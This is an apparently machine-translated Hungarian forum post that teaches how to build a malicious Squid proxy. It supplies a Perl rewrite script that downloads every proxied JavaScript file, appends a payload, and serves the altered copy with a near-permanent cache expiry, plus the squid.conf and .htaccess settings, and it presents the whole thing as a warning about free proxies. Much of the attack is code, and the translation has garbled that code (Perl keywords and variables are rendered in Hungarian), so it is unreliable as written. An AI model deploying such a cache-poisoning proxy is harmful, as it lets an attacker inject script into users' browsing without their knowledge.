Ezt a bejegyzést utoljára Mo Xiaowen szerkesztette 2015-6-7 23:19-én
Ezt egyszerűen a SQUID konfigurációjának módosításával lehet megvalósítani
Mi az a SQUID?
A Squid egy olyan szoftver, amely internetes adatokat gyorsatároz, fogad letöltési kéréseket a felhasználóktól, és automatikusan feldolgozza a letöltött adatokat. Amikor egy felhasználó le akar tölteni egy kezdőlapot, küldheti a kérést Squidnak, megkérheti, hogy töltse le helyette, majd Squid csatlakozik a weboldalhoz, kéri a kezdőlapot, majd elküldi a kezdőlapot a felhasználónak, miközben tart egy biztonsági mentést; amikor más felhasználók ugyanarra az oldalra jelentkeznek, Squid azonnal elküldi a mentett mentést a felhasználónak, így a felhasználó úgy érezte, hogy a sebesség elég gyors. A Squid képes proxy protokollokat, mint a HTTP, FTP, GOPHER, SSL és WAIS, és Squid automatikusan kezeli, és a Squidot a saját igényeid szerint állíthatod be, hogy kiszűrd a nem kívánt dolgokat.
A Squid számos operációs rendszerben működik, például AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 stb.
A megvalósítás nagyon egyszerű:
1. Telepítsd a Squidot egy Linux szerverre.
2. Módosítsuk a szerver kódját, beillesztsünk egy darabot a kódunkból az összes továbbított javascripbe, és küldjük ki.
3. Állítsuk be a módosított js fájl gyorsítótár idejét a lehető legmagasabbra.
Ez a módszer SSL engedélyezett weboldalakra is érvényes: ha a weboldal betölt egy nem biztonságos erőforrást (például egy HTTP oldal jquery-jét), a legtöbb böngésző figyelmeztetést ad, de kevesen figyelnek rá.
Chema elmondta, hogy több mint 5000 ember használta a proxyját néhány nappal a kiadása után, és a legtöbben rossz dolgokra használták, mert használták a proxyt, így névtelennek és biztonságosnak gondolták, de sosem gondolták volna, hogy a proxy szerver is rosszat fog tenni.
Készítsd el a rosszindulatú proxy szerveredet
Ha már van Squid proxy szervered, akkor szükséged lesz egy webszerverre, például az Apache-re.
1. lépés: Hasznos rakomány létrehozása
Egy egyszerű szkriptet használok demonstrációként, hogy az összes linket a weboldalamra irányítsam.
/etc/squid/payload.js
[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
2. lépés: Írj egy szkriptet, amely megfertőzze az összes JS fájlt
/etc/squid/poison.pl
[mw_shl_code=perl,igaz]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
miközben (<>)
{
chomp $_;
if($_ =- /(.*.js)/i)
{
$url = 1 dollár;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
nyomtatás: "http://127.0.0.1:80/tmp/$pid-$count.js";
}
más
{
nyomtatás: "$_";
}
$count++;
}[/mw_shl_code]
Ez a szkript a wget-et használja, hogy megkapja az oldal eredeti javascripjét, eltávolítja a t fájlt, majd hozzáadja a kódot az /etc/squid/payload.js be, és elküldi a módosított fájlt a kliensnek, miközben létre kell hoznod a /var/www/tmp könyvtárat, és engedélyezned kell a squid számára, hogy fájlokat írjon benne. Ez a könyvtár tárolja a módosított js fájlokat.
3. lépés: Kombináld a fenti forgatókönyvet a tintahal-szel
Add hozzá az /etc/squid/squid.conf fájlba
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
4. lépés: Tedd hogy a gyorsítótár soha ne hibáslan!
/var/www/tmp/.htaccess
[mw_shl_code=html,igaz] ExpiresActive On
ExpiresAlapértelmezett "hozzáférés plusz 3000 nap"[/mw_shl_code]
Ez azt mondja Apache-nak, hogy adjon neki hosszú lejárati időt, amíg a felhasználó ki nem takarítja a gyorsaságot.
Ha csatlakoztatod ezt a proxyt, bármelyik linkre kattintva átirányít a weboldalamra, és a cache még akkor is megmarad, ha később nem használod a proxyt. Most használtam egy nem agresszív hasznos rakományt, és ezzel a módszerrel a hackerek sokkal többet tudnak tenni. Ezért emlékeztesd magad és barátaidat, hogy légy óvatos az ingyenes proxyk használatával.
|
Közzétéve 2015. 01. 19. 2:34:56
|
|
|
|
Közzétéve 2015. 01. 19. 8:48:45
|
Háziúr|
Közzétéve 2015. 01. 20. 14:36:06
|
